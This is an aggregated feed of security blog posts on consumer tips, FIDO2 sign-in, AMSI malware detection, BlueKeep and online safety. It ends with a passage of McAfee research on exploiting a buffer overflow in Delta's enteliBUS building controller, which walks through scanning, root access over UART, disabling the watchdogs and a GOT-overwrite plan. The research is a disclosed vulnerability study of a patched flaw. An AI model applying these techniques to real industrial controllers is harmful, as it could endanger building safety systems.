  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public. Protect your identity by turning your profiles to private so you can control who can follow you. You should also take the time to understand the various security and privacy settings to see which work best for your lifestyle.
  • Use the cloud with caution. If you plan on storing your documents in the cloud, be sure to set up an additional layer of access security. One way of doing this is through two-factor authentication.
  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to keep your connection secure.
  • Discuss cyber safety often. It’s just as important for families to discuss cyber safety as it is for them to discuss privacy on social media. Talk to your family about ways to identify phishing scams, what to do if you may have been involved in a data breach, and invest in security software that scans for malware and untrusted sites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season appeared first on McAfee Blogs.

Making authentication even easier with FIDO2-based local user verification for Google Accounts


Passwords, combined with Google's automated protections, help secure billions of users around the world. But, new security technologies are surpassing passwords in terms of both strength and convenience. With this in mind, we are happy to announce that you can verify your identity by using your fingerprint or screen lock instead of a password when visiting certain Google services. The feature is available today on Pixel devices and coming to all Android 7+ devices over the next few days.



Simpler authentication experience when viewing your saved password for a website on passwords.google.com


These enhancements are built using the FIDO2 standards, W3C WebAuthn and FIDO CTAP, and are designed to provide simpler and more secure authentication experiences. They are a result of years of collaboration between Google and many other organizations in the FIDO Alliance and the W3C.

An important benefit of using FIDO2 versus interacting with the native fingerprint APIs on Android is that these biometric capabilities are now, for the first time, available on the web, allowing the same credentials be used by both native apps and web services. This means that a user only has to register their fingerprint with a service once and then the fingerprint will work for both the native application and the web service.

Note that your fingerprint is never sent to Google’s servers - it is securely stored on your device, and only a cryptographic proof that you’ve correctly scanned it is sent to Google’s servers. This is a fundamental part of the FIDO2 design.

Here is how it works

Google is using the FIDO2 capability on Android to register a platform-bound FIDO credential. We remember the credential for that specific Android device. Now, when the user visits a compatible service, such as passwords.google.com, we issue a WebAuthn “Get” call, passing in the credentialId that we got when creating the credential. The result is a valid FIDO2 signature.


High-level architecture of using fingerprint or screen lock on Android devices to verify a user’s identity without a password

Please follow the instructions below if you’d like to try it out.
Prerequisites
  • Phone is running Android 7.0 (Nougat) or later
  • Your personal Google Account is added to your Android device
  • Valid screen lock is set up on your Android device
To try it
  • Open the Chrome app on your Android device
  • Navigate to https://passwords.google.com
  • Choose a site to view or manage a saved password
  • Follow the instructions to confirm that it’s you trying signing in
You can find more detailed instructions here.

For additional security
Remember, Google's automated defenses securely block the overwhelming majority of sign-in attempts even if an attacker has your username or password. Further, you can protect your accounts with two-step verification (2SV), including Titan Security Keys and Android phone’s built-in security key.

Both security keys and local user verification based on biometrics use the FIDO2 standards. However, these two protections address different use cases. Security keys are used for bootstrapping a new device as a second factor as part of 2SV in order to make sure it’s the right owner of the account accessing it. Local user verification based on biometrics comes after bootstrapping a device and can be used for re-authentication during step-up flows to verify the identity of the already signed-in user.

What’s next
This new capability marks another step on our journey to making authentication safer and easier for everyone to use. As we continue to embrace the FIDO2 standard, you will start seeing more places where local alternatives to passwords are accepted as an authentication mechanism for Google and Google Cloud services. Check out this presentation to get an early glimpse of the use cases that we are working to enable next.

McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of Malware since the start of 2019. This blog will help show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner will scan scripts once they have been executed. This enables the scanner to de-obfuscate the script and scan it using DAT content. This is useful as the original scripts can be heavily obfuscated and are difficult to generically detect, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead it will appear in the ENS log and event viewer as show below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner

The PowerMiner malware is a cryptocurrency malware whose purpose is to infect as many machines as possible to mine Monero currency. The initial infection vector is via phishing emails which contain a batch file. Once executed, this batch file will download a malicious PowerShell script which will then begin the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams  detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool, however malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being downloaded to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (Not currently released) will use Real Protect Machine Learning to detect PowerShell AMSI generated content.

This is done by extracting features from the AMSI buffers and running these against the ML classifier to decide if the script is malicious or not. An example of this is shown below:

 

Thanks to this detection technique, MVISION EndPoint can detect Zero-Day PowerShell threats.

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION EndPoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

UPDATE: ACSC confirms potential exploitation of BlueKeep vulnerability

Thousands of Australian businesses using older Windows systems should immediately install a patch to avoid being compromised. The Australian Signals Directorate (ASD) is aware of malicious activity that indicates potential widespread abuse of the BlueKeep vulnerability known as CVE-2019-0708, affecting older versions of Windows operating systems including the Windows Vista, Windows 7, Windows XP, Server 2003 and Server 2008 operating systems.

From Watergate to El Paso: should we be relying on unelected bodies to protect us? | John Naughton

Web security firm Cloudflare’s decision to terminate 8chan as a customer is welcome, but risks setting a dangerous precedent

Last Saturday morning, a gunman armed with an assault rifle walked into a Walmart store in El Paso, Texas, and shot 22 people dead and injured 24 more. Shortly before he did so, a post by him appeared on the /pol/ [politically incorrect] message board of the far-right website 8chan. Attached to it was a four-page “manifesto”. The 8chan thread was quickly deleted by a site moderator (it was news to me that 8chan had moderators), but archived copies of it rapidly circulated on the internet.

“There is nothing new in this killer’s ramblings,” wrote one analyst who had read it. “He expresses fears of the same ‘replacement’ of white people that motivated the Christchurch shooter and notes that he was deeply motivated by that shooter’s manifesto.”

Continue reading...

How to Help Kids Steer Clear of Digital Drama this School Year

Editor’s note: This is Part II of helping kids manage digital risks this new school year. Read Part I.

The first few weeks back to school can be some of the most exciting yet turbulent times of the year for middle and high schoolers. So as brains and smartphones shift into overdrive, a parent’s ability to coach kids through digital drama is more critical than ever.

Paying attention to these risks is the first step in equipping your kids to respond well to any challenges ahead. Kids face a troubling list of social realities their parents never had to deal with such as cyberbullying, sexting scandals, shaming, ghosting, reputation harm, social anxiety, digital addiction, and online conflict.

As reported by internet safety expert and author Sue Scheff in Psychology Today, recent studies also reveal that young people are posting under the influence and increasingly sharing risky photos. Another study cites that 20 percent of teens and 33 percent of young adults have posted risky photos and about 8 percent had their private content forwarded without their consent.

No doubt, the seriousness of these digital issues is tough to read about but imagine living with the potential of a digital misstep each day? Consider:

  • How would you respond to a hateful or embarrassing comment on one of your social posts?
  • What would you do if your friends misconstrued a comment you shared in a group text and collectively started shunning you?
  • What would you do if you discovered a terrible rumor circulating about you online?
  • Where would you turn? Where would you support and guidance?

If any of these questions made you anxious, you understand why parental attention and intention today is more important than ever. Here are just a few of the more serious sit-downs to have with your kids as the new school year gets underway.

Let’s Talk About It

Define digital abuse. For kids, the digital conversation never ends, which makes it easier for unacceptable behaviors to become acceptable over time. Daily stepping into a cultural melting pot of values and behaviors can blur the lines for a teenage brain that is still developing. For this reason, it’s critical to define inappropriate behavior such as cyberbullying, hate speech, shaming, crude jokes, sharing racy photos, and posting anything intended to cause hurt to another person.

If it’s public, it’s permanent. Countless reputations, academic pursuits, and careers have been shattered because someone posted reckless digital content. Everything — even pictures shared between best friends in a “private” chat or text — is considered public. Absolutely nothing is private or retractable. That includes impulsive tweets or contributing to an argument online.

Steer clear of drama magnets. If you’ve ever witnessed your child weather an online conflict, you know how brutal kids can be. While conflict is part of life, digital conflict is a new level of destruction that should be avoided whenever possible. Innocent comments can quickly escalate out of control. Texting compromises intent and distorts understanding. Immaturity can magnify miscommunication. Encourage your child to steer clear of group texts, gossip-prone people, and topics that can lead to conflict.

Mix monitoring and mentoring. Kids inevitably will overshare personal details, say foolish things, and make mistakes online. Expect a few messes. To guide them forward, develop your own balance of monitoring and mentoring. To monitor, know what apps your kids use and routinely review their social conversations (without commenting on their feeds). Also, consider a security solution to help track online activity. As a mentor, listening is your superpower. Keep the dialogue open, honest, and non-judgmental and let your child know that you are there to help no matter what.

Middle and high school years can be some of the most friendship-rich and perspective-shaping times in a person’s life. While drama will always be part of the teenage equation, digital drama and it’s sometimes harsh fallout doesn’t have to be. So take the time to coach your kids through the rough patches of online life so that, together, you can protect and enjoy these precious years.

The post How to Help Kids Steer Clear of Digital Drama this School Year appeared first on McAfee Blogs.

From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager

Management. Control. It seems that you can’t stick five people in a room together without one of them trying to order the others around. This tendency towards centralized authority is not without reason, however – it is often more efficient to have one person, or thing, calling the shots. For an example of the latter, one needs look no further than Delta’s enteliBUS Manager, or eBMGR. Put simply, this device aims to centralize control for various pieces of hardware often found in corporate or industrial settings, whether it be temperature and humidity controls for a server room, a boiler and its corresponding alarms and sensors in a factory, or access control and lighting in a business. The advantages seem obvious, too – it can be configured to adjust fan speeds according to thermostat readings or sound an alarm if pressure crosses a certain threshold, all with little human interaction.

The disadvantages, while less obvious, become clear when one considers tech-savvy malicious actors. Suddenly, your potentially critical system now has a single point of failure, and one that is attached to a network, to make matters worse.

Consider for a moment a positive pressure room in a hospital, the kind typically used to keep out contaminants during surgeries. Managing rooms such as these is a typical application for the eBMGR and it does not take an overactive imagination to envision what kind of damage a bad actor could cause if they disrupted such a sensitive environment.

Management. Control. That’s what’s at stake if a device such as this is not properly secured. It’s also what made this device such a high priority for McAfee’s Advanced Threat Research team. The decision to make network-connected critical systems such as these demands an extremely high standard of software security – finding where it might fall short is precisely our job.

With these stakes in mind, our team went to work. We began by hooking up an eBMGR unit to a network with several other devices to simulate an environment somewhat true to life. Using a technique known as “fuzzing”, we then blasted the device with all kinds of deliberately malformed network traffic, looking for a chink in the armor. That is one advantage often afforded to the bad guys in software security; they can make many mistakes; manufacturers need only make one.

Perhaps unsurprisingly, persistence and creativity led us to discover one such mistake: a mismatch in the memory sizes used to handle incoming network data created what is often referred to as a buffer overflow vulnerability. This seemingly innocuous mistake rendered the eBMGR vulnerable to our carefully crafted network attack, which allows a hacker on the same network to gain complete control of the device’s operating system. Worse still, the attack uses what is known as broadcast traffic, meaning they can launch the attack without knowing the location of the targets on the network. The result is a twisted version of Marco Polo – the hacker needs only shout “Marco!” into the darkness and wait for the unsuspecting targets to shout “Polo!” in response.

In this field, complete control of the operating system is typically the finish line. But we weren’t content with just that. After all, controlling the eBMGR on its own is not all that interesting; we wanted to see if we could use it to control all the devices it was connected to. Unfortunately, we did not have the source code for the device’s software, so this new goal proved non-trivial.

We went back to the drawing board and acquired some additional hardware that the Delta device might realistically be charged with managing and had a certified technician program the device just as he would for a real-world client – in our case, as an HVAC controller. Our strategy quickly became what is often referred to as a replay attack. As an example, if we wanted to determine how to tell the device to flip a switch, we would first observe the device flipping the switch in the “normal” way and try to track down what code had to run for that to happen. Next, we would try to recreate those conditions by running that code manually, thus replaying the previously observed event. This strategy proved effective in granting us control over every category of device the eBMGR supports. Moreover, this method remains agnostic to the specific hardware attached to the building manager. Hypothetically, this sort of attack would work without any prior knowledge of the device’s configuration.

The result was an attack that would compromise any enteliBUS Manager on the same network and attach a custom piece of malware we developed to the software running on it. This malware would then create a backdoor which would allow the attacker to remotely issue commands to the manager and control any hardware connected to it, whether it be something as benign as a light switch or as dangerous as a boiler.

To make matters worse, if the attacker knows the IP address of the device ahead of time, this exploit can be performed over the Internet, increasing its impact exponentially. At the time of this writing, a Shodan scan revealed that over 1600 such devices are internet connected, meaning the danger is far from hypothetical.

For those craving the nitty-gritty technical details of how we went about accomplishing this, we also published what is arguably a novella here that delves into the vulnerability discovery and exploitation process from start to finish.

In keeping with our responsible disclosure program, we reached out to Delta Controls as soon as we confirmed that the initial vulnerability we discovered was exploitable. Shortly thereafter, they provided us with a beta version of a patch meant to fix the vulnerability and we confirmed that it did just that – our attack no longer worked. Furthermore, by using our understanding of how the attack is performed at a network level, we were able to add mitigation for this vulnerability to McAfee’s Network Security Platform (NSP) via NSP signature 0x45d43f00, helping our customers remain secure. This is our idea of a success story – researchers and vendors coming together to improve security for end users and ultimately reduce the attack surface for the adversary. If there’s any doubt they are interested in targets like these, a quick search will illuminate the myriad attempts to exploit industrial control systems as a top target of interest.

Before we leave you with “all’s well that ends well”, we want to stress that there is a lesson to be learned here: it doesn’t take much to make a critical system vulnerable. Thus, it is important that companies extend proper security practices to all network-connected devices – not just PCs. Such practices might include placing all internet-connected devices behind a firewall, monitoring traffic to these devices, segregating them from the rest of the network using VLANs, and staying on top of security updates. For critical systems that cannot afford significant downtime, updates are often pulled instead of pushed, putting the onus on end users to keep these devices up to date. Whatever the precise implementation may be, a good security policy often begins by adopting the principle of least privilege, or the idea that all access should be restricted by default unless there is a compelling reason for it. For example, before approaching the challenge of keeping a device like the eBMGR secure on the internet, it’s important to first ask if having it connected to internet is necessary in the first place.

While companies and consumers should certainly take the proper steps to keep their networks secure, manufacturers must also take a proactive approach towards addressing vulnerabilities that impact their end users. Delta Controls’ willingness to collaborate and timely response to our disclosure certainly seems like a step in the right direction. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager appeared first on McAfee Blogs.

HVACking: Understanding the Delta Between Security and Reality

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. We recently investigated an industrial control system (ICS) produced by Delta Controls. The product, called “enteliBUS Manager”, is used for several applications, including building management. Our research into the Delta controller led to the discovery of an unreported buffer overflow in the “main.so” library. This flaw, identified by CVE-2019-9569, ultimately allows for remote code execution, which could be used by a malicious attacker to manipulate access control, pressure rooms, HVAC and more. We reported this research to Delta Controls on December 7th, 2018. Within just a few weeks, Delta responded, and we began an ongoing dialog while a security fix was built, tested and rolled out in late June of 2019. We commend Delta for their efforts and partnership throughout the entire process.

The vulnerable firmware version tested by McAfee’s Advanced Threat Research team is 3.40.571848. It is likely earlier versions of the firmware are also vulnerable, however ATR has not specifically tested these. We have confirmed the patched firmware version 3.40.612850 effectively remediates the vulnerability.

This blog is intended to provide a deep and thorough technical analysis of the vulnerability and its potential impact. For a high-level, non-technical walk through of this vulnerability, please refer to our summary blog post here.

Exploring the Attack Surface

The first task when researching a new device is to understand how it works from both a software and hardware perspective. Like many devices in the ICS realm, this device has three main software components; the bootloader, system applications, and user-defined programming. While looking at software for an attack vector is important, we do not focus on any surface which is defined by the users since this will potentially change for every install. Therefore, we want to focus on the bootloader and the system applications. With the operating system, it is common for manufacturers to implement custom code to operate the device regardless of an individual user’s programming. This custom code is often where most vulnerabilities exist and extends across the entire product install base. Yet, how do we access this code? As this is a critical system, the firmware and software are not publicly available and there is limited documentation. Thus, we are limited to external reconnaissance of the underlying system software. Since the most critical vulnerabilities are remote, it made sense to start with a simple network scan of the device. A TCP scan showed no ports open and a UDP scan only showed ports 47808 and 47809 to be open. Referring to the documentation, we determined this is most likely used for a protocol called Building Automation Control Network (BACnet). Using a BACnet-specific network enumeration script, we determined slightly more information:

root@kali:~# nmap –script bacnet-info -sU -p 47808 192.168.7.15

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 11:03 EDT
Nmap scan report for 192.168.7.15
Host is up (0.00032s latency).

PORT STATE SERVICE
47808/udp open bacnet
| bacnet-info: 
| Vendor ID: Delta Controls (8)
| Vendor Name: Delta Controls
| Object-identifier: 29000
| Firmware: 571848
| Application Software: V3.40
| Model Name: eBMGR-TCH

The next question is, what can we learn from the hardware? To answer this question, the device was first carefully disassembled, as shown in Figure 1.

Figure 1

The controller has one board to manage the display and a main baseboard which holds a System on a Module (SOM) chip containing both the processor and flash modules. With a closer look at the baseboard, we made a few key observations. First, the processor is an ARM926EJ core processor, the flash module is a ball grid array (BGA) chip, and there are several unpopulated headers on the board.

Figure 2

To examine the software more effectively, we needed to determine a method of extracting the firmware. The BGA chip used by the system for flash memory will mostly likely hold the firmware; however, this poses another challenge. Unlike other chips, BGA chips do not provide pins externally which can be attached to. This means to access the chip directly, we would need to desolder the chip from the board. This is not ideal since we risk damaging the system.

We also noticed several unpopulated headers on the board. This was promising as we could find an alternative method of exacting the firmware using one of these headers. Soldering pins to each of the unpopulated headers and using a logic analyzer, we determined that the 4-pin header in the center of the board is a universal asynchronous receiver-transmitter (UART) header running at a baud rate of 115200.

Figure 3

Using the Exodus XI Breakout board (shout out to @Logan_Brown and the Exodus team) to connect to the UART headers, we were met with an unprotected root prompt on the system. Now with full access to the system, we could start to gain a deeper understanding of how the system works and extract the firmware.

Figure 4

Firmware Extraction and System Analysis

With the UART interface, we could now explore the system in real-time, but how could we extract the firmware for offline analysis? The device has two USB ports which we were able to use to mount a USB drive. This allowed us to copy what is running in memory using dd onto a flash drive, effectively extracting the firmware. The next question was, what do we copy?

Using “/proc/mtd” to gain information about how memory is partitioned, we could see file systems located on mtd4 and mtd5. We used dd to copy off both the mtd4 and mtd5 partitions. We later discovered that one of the images is a backup used as a system fall back if a persistent issue is detected. This filesystem copied became increasingly useful as the project continued

With the active UART connection, it was now possible to investigate more about how the system is running. Since we were able to previously determine the device is only listening on ports 47808 and 47809, whichever application is listening on these ports would be the only point of an attack for a remote exploit. This was quickly confirmed using “netstat -nap” from the UART console.

We noticed that port 47808 was being used by an application called “dactetra”. With minimal further investigation, it was determined that this is a Delta-controller-specific binary was responsible for the main functions of the device.

Finding a Vulnerability

With a device-specific binary listening on the network via an open port, we had an ideal place to start looking for a vulnerability. We used the common approach of network fuzzing to start our investigation. To implement network fuzzing for BACnet, we turned to a tool produced by Synopsys called Defensics, which has a module designed for BACnet servers. Although this device is not a BACnet server and functions more as a router, this test suite provided several universal test cases which gave us a great place to start. BACnet utilizes several types of broadcast packets to communicate. Two such broadcast packets, “Who-Is” and “I-Am” packets, are universal to all BACnet devices and Defensics provides modules to work with them. Using the Defensics fuzzer to create mutations of these packets, we were able to observe the device encountering a failure point, producing a core dump and immediately rebooting, shown in Figure 5.

Figure 5

The test case which caused the crash was then isolated and run several more times to confirm the crash was repeatable. We discovered during this process that it takes an additional 96 packets sent after the original malformed packet to cause the crash. The malformed packet in the series was an “I-Am” packet, as seen below. The full packet is not shown due to its size.

Figure 6

Examining further, we could quickly see that the fuzzer created a packet with a BACnet layer size of 8216 bytes, using “0x22”. We could also see the fuzzer recognized the max acceptable size for the BACnet application layer as only 1476 bytes. Additional testing showed that sending only this packet did not produce the same results; only when all 97 packets were sent did the crash occur.

Analyzing the Crash

Since the system provides a core dump upon crashing, it was logical to analyze it for further information. From the core dump (reproduced in Figure 7), we could see the device encountered a segmentation fault. We also saw that register R0 contained what looked like data copied from our malformed packet, along with the backtrace being potentially corrupted.

Figure 7

The core dump also provided us the precise location of the crash. Using the memory map from the device, it was possible to determine that address 0x4026e580 is located in memcpy. Since the device does not deploy Address Space Layout Randomization (ASLR), the memory address did not change throughout our testing. As we had successfully extracted the firmware, we used IDA Pro to attempt to learn more about why this crash was occurring. The developers did not strip the binaries during compiling time, which helped simplify the reversing process in IDA.

Figure 8

The disassembly told us that memcpy was attempting to write what was in R3 to the “address” stored in R0. In this case, however, we had corrupted that address, causing the segmentation fault. The contents of several other registers also provided additional information. The value 0x81 in R3 was potentially the first byte of a BACnet packet from the BACnet Virtual Link Control (BVLC) layer, identifying the packet as BACnet. By looking at R3 and the values at the address in R5 together, we confirmed with more certainty that this was in fact the BVLC layer. This implied the data being copied was from the last packet sent and the destination for the copied data was taken from the first malformed packet. Registers R8 and R10 held the source and destination port numbers, respectively, which in this case were both 0xBAC0 (accounting for endianness), or 47808, the standard BACnet port. R4 held a memory address which, when examined, showed a section of memory that looks to have been overwritten. Here we saw data from our malformed packet (0x22); in some areas, memory was partially overwritten with our packet data. The value for the destination of the memcpy appeared to be coming from this region of memory. With no ASLR enabled, we could again count on this always landing in the same location.

Figure 9

At this point, with the information provided by the core dump, packets, and IDA, we were fairly certain that the crash found was a buffer overflow. However, memcpy is a very common function, so we needed to determine where exactly this crash was coming from. If the destination address for the memcpy was getting corrupted, then the crash in memcpy was simply collateral damage from the buffer overflow – so what code was causing the buffer overflow to occur? A good place to start this analysis would be the backtrace; however, as seen above, the backtrace was corrupted from our input. Since this device uses an ARM processor, we could look at the LR registers for clues on what code called this memcpy. Here, LR was pointing to 0x401e68a8 which, when referencing the memory map of the process, falls in “main.so”. After calculating the offset to use for static analysis, we arrived at the code in Figure 10.

Figure 10

The LR register was pointing to the instruction which is called after memcpy returns. In this case, we were interested in the instruction right before the address LR is pointing to, at offset 0x15C8A4. At first glance, we were surprised not to see the expected memcpy call; however, digging a little deeper into the scNetMove function we found that scNetMove is simply a wrapper for memcpy.

Figure 11

So, how did the wrong destination address get passed to memcpy? To answer this, we needed a better understanding of how the system processes incoming packets along with what code is responsible for setting up the buffers sent to memcpy. We can use ps to evaluate the system as it is running to see that the main process spawns 19 threads:

Table 1

The function wherein we found the “scNetMove” was called “scBIPRxTask” and was only referenced in one other location outside of the main binary; the initialization function for the application’s networking, shown in Figure 12.

Figure 12

In scBIPRxTask’s disassembly, we saw a new thread or “task” being created for both BACnet IP interfaces on ports 47808 and 47809. These spawned threads would handle all the incoming packets on their respective ports. When a packet would be received by the system, the thread responsible for scBIPRxTask would trigger for each packet. Using the IDA Pro decompiler, we could see what occurs for each packet. First, the function uses memset to zero out an allocated buffer on the stack and read from the network socket into this buffer. This buffer becomes the source for the following memcpy call. The new buffer is created with a static size of 1732 bytes and only 1732 bytes are appropriately read from the socket.

Figure 13

After reading data from the socket, the function sets up a place to store the packet it has just received. Here it uses a function called “pk_alloc,” which takes the size of the packet to create as its only argument. We noticed that the size was another static value and not the size received from the socket read function. This time the static value passed is 1476 bytes. This allocated buffer is what will become the destination for the memcpy.

Figure 14

With both a source and destination buffer allocated, “scNetMove” is called and subsequently memcpy is called, passing both buffers along with the size parameter taken from the socket read return value.

Figure 15

This code path explains why and how the vulnerability occurs. For each packet sent, it is copied off the stack into memory; however, if the packet is longer than 1476 bytes, for each byte over 1476 and less than or equal to 1732, that many bytes in memory past the end of the destination buffer are overwritten. Within the memory which is overwritten, there is an address to the destination of a later memcpy call. This means there is a buffer overflow vulnerability that leads to an arbitrary write condition. The first malformed packet overwrites a section of memory with attacker-defined data – in this case, the address where the attacker wishes to write to. After an additional 95 packets are read by the system, the address controlled by the attacker will be put into memcpy as the destination buffer. The data in the last packet, which does not need to be malformed, is what will be written to the location set in the earlier malformed packet. Assuming the last packet is also controlled by the attacker, this is now a write-what-where condition.

Kicking the Dog

With a firm grasp on the discovered vulnerability, the next logical step was to attempt to create a working exploit. When developing an exploit, the ability to dynamically debug the target is extremely valuable. To this end, the team first had to cross-compile debugging tools such as gdbserver for the device’s specific kernel and architecture. Since the device runs an old version of the Linux kernel, we used an old version of Buildroot to build gdbserver and later other applications.

Using a USB drive to transfer gdbserver onto the device, an initial attempt to debug the running application was made. A few seconds after connecting the debugger to the application, the device initiated a reboot, as shown in Figure 16.

 

Figure 16

An error message gave us a clue on why the crash occurred, indicating a watchdog timer failure. Watchdog timers are common in critical embedded devices that if the system hangs for a predetermined amount of time, it takes action to try and correct the problem. In this case, the action chosen by the developers is to reboot the system. Searching the system binaries for this error message revealed the section of code shown in Figure 17.  The actual error messages have been redacted at the request of the vendor.

 

Figure 17

The function is decrementing three counters. If any of the counters ever get to zero, then an error is thrown and later the system is rebooted. Examining the code further shows that multiple processes call this function to check the counters very frequently. This means we are not going to be able to dynamically debug the system without figuring out how to disable this software watchdog.

One common approach to this problem is to patch the binaries. It is important when looking at patching a binary to ensure the patch you employ does not introduce any unintended side effects. This generally means you want to make the smallest change possible. In this case, the smallest meaningful change the team came up with was to modify the “subtract by 5” to a “subtract by 0.”  This would not change how the overall program functioned; however, every time the function was called to decrement the counter, the counter would simply never get smaller. The patched code is provided in Figure 18. Notice the IDA decompiler has completely removed the subtraction statement from the code since it is no longer meaningful.

 

Figure 18

With the software watchdog patched, the team attempted to again dynamically debug the application. Initially the test was thought to be successful, since it was possible to connect to gdbserver and start debugging the application. However, after three minutes the system rebooted again. Figure 19 shows the message the team caught on reboot after several repeated experiments with the same results.

 

Figure 19

This indicates that in the boot phase of startup, a hardware watchdog is set to 180 seconds (or three minutes). The system has two watchdog timers, one hardware and one software; we had only disabled one of the timers. The same method of patching the binary which was used to disable the software watchdog timer would not work for the hardware watchdog timer; the application would also need to kick the watchdog to prevent a reboot. Armed with this knowledge, we turned to the Delta binaries on the device for code that could help us “kick” the hardware watchdog. With the debugging symbols left in, it was relatively easy to find a function which was responsible for managing the hardware watchdog.

There are several approaches which could be used to attempt to disable the hardware watchdog. In this scenario, we decided to take advantage of the fact that the code which dealt with the hardware watchdog was in a shared library and exported. This allowed for the creation of a new program using the existing watchdog-kicking code. By creating a second program that will kick the hardware watchdog, we could debug the Delta application without the system resetting.

This program was put in the init script of the system, so it would run on boot and continually “kick the dog”, effectively disabling the hardware watchdog. Note: no actual dogs were harmed in the research or creation of this exploit. If anything, they were given extra treats and contributed to the coding of the watchdog patch. Here are some very recent photos of this researcher’s dogs for proof.

 

Figure 20

With both the hardware and software watchdog timers pacified, we could continue to determine if our previously discovered vulnerability was exploitable.

Writing the Exploit

Before attempting exploitation, we wanted to first investigate if the system had any exploit mitigations or limitations we needed to be aware of. We began by running an open source script called “checksec.sh”. This script, when run on a binary, will report if any of the common exploit mitigations are in place. Figure 21 shows the script’s output when ran on the primary Delta binary, named “dactetra”.

Figure 21

The check came back with only NX enabled. This also held true for each of the shared libraries where the vulnerable code is located.

As discussed above, the vulnerability allows for a write-what-where condition, which leads us to the most important question: what do we want to write where? Ultimately, we want to write shellcode somewhere in memory and then jump to that shellcode. Since the attacker controls the last packet sent, it is plausible that the attacker could have their shellcode on the stack. If we put shellcode on the stack, we would then have to bypass the No eXecute (NX) protection discovered using the checksec tool. Although this is possible, we wondered if there was a simpler method.

Reexamining the crash dump at the memory location which has been overwritten by the large malformed packet, we found a small contiguous section of heap memory, totaling 32 bytes, which the attacker could control. We came to this conclusion because of the presence of 0x22 bytes – the contents of the malformed packet’s payload. At the time the overflow occurs, more of this region is filled with 0x22’s, but by the time our write-what-where condition is triggered, many of these bytes get clobbered, leaving us with the 32-byte section shown in Figure 22.

Figure 22

Being heap memory, this region was also executable, a detail that will become important shortly. Replacing the 0x22’s in the malformed packet with a non-repeating pattern both revealed where in the payload to place our shell code and confirmed that the bytes in this region were all unique.

With a potential place to put our shellcode, the next major component to address was controlling execution. The write-what-where condition allowed us to write anywhere in memory; however, it did not give us control of execution. One technique to tackle this problem is to leverage the Global Offset Table (GOT). In Linux, the GOT redirects a function pointer to an absolute location and is located in the .got section of an ELF executable or shared object. Since the .got section is written to at execution time, it is generally still writable later during execution. Relocation Read Only (RELRO) is an exploit mitigation which marks the loaded .got section read-only once it is mapped; however, as seen above, this protection was conveniently not enabled. This meant it was possible to use the write-what-were condition to write the address of our shellcode in memory to the GOT, replacing a function pointer of a future function call. Once the replaced function pointer is called, our shellcode would be executed.

But which function pointer should we replace? To ensure the highest probability of success, we decided it would be best to replace the pointer to a function that is called as close to the overwrite as possible. This is because we wanted to minimize changes to the memory layout during program execution. Examining the code again from the return of the “scNetMove” function, we see within just a few instructions “scDecodeBACnetUDP” is called. This therefore becomes the ideal choice of pointer to overwrite in the GOT.

Figure 23

